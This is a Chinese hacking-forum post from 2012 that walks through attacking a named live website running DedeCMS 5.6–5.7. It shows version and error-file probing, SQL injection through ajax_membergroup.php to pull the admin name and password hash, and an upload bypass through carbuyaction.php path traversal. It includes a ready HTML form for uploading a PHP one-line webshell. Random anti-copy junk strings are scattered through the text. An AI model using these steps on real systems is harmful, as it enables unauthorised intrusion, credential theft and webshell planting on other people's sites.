中国网络渗透测试联盟
标题:
dedecms5.6-5.7注入与上传漏洞利用
[打印本页]
作者:
admin
时间:
2012-9-13 10:56
标题:
dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
, m7 `& r, d$ O
这站
http://www.political-security.com/
0 l6 J/ V' D' g& m
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
" ]! o+ T% X! \+ s! L ]8 Z
www.political-security.com/data/mysql_error_trace.inc
爆后台
$ B) L' I7 o7 N% [" T9 m# y- @0 }
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
: E# f) `( G# F) \8 L7 ^
然后写上语句
# u4 |; i ~1 H; l' ]* @; @
查看管理员帐号
$ g! U! {' K5 n4 B
http://www.political-security.co ... &membergroup=@`
( d- H: B( a, A( P: Y7 |/ a
& M9 s9 E5 ^4 J% `, y0 @' k$ l) i. c
admin
9 ?, P% E: z5 d* l1 Y: {6 a. t7 H
7 O' f/ L9 O6 R" S$ \8 l% h
查看管理员密码
; h2 g# R1 G& L" `2 ]
http://www.political-security.co ... &membergroup=@`
1 d. s( n" }1 j' Y/ Q
8 E3 e, H: O7 V j& |
8d29b1ef9f8c5a5af429
' X& {4 p9 q3 p: [8 q0 e
2 ?, Y! \' b8 O3 j% {/ u
查看管理员密码
2 I8 w2 a& M: F7 V/ t) s
3 }8 q5 ?' |; Z5 g! n, O& f' Q
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
. D( [: s" }) n. h: F% {
2 |. d3 ~: O7 S( {; L) k4 w9 k
8d2
3 d- m1 b3 Q4 `( ~
9b1ef9f8c5a5af42
. v: O0 {7 f( R5 J F
9
F! x' \# N" S. X# L% |
; ~ G* X% ~4 m! L8 g7 z5 q
cmd5没解出来 只好测试第二个方法
( l. r1 V: e* l; e4 V5 K
3 M1 O& d E" v+ a K5 ?
& o9 K6 T: f6 ~* W
②上传漏洞:
$ x) Q4 b# h6 @. ?1 {% d; V
4 _" m- R. c6 x- ~. |+ d9 ?
只要登陆会员中心,然后访问页面链接
8 |) V! g; x1 R3 U y$ {
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
" T: m1 y& s1 q5 f
4 i8 `$ o) X! Q }( g, z7 c
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
1 F( R/ M* b t/ u/ C9 M4 w
: C# d4 k' ]& l3 t _
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
2 @# O4 L+ s% b. E+ l5 D1 r+ I% o
) u5 O8 U; s! y6 E& K. U2 Z; s+ [
<form action="http://
www.political-security.com
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
) d# F3 a9 G" A/ ~
或者
y0 v( n- I m% O3 |6 [
即可上传成功
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2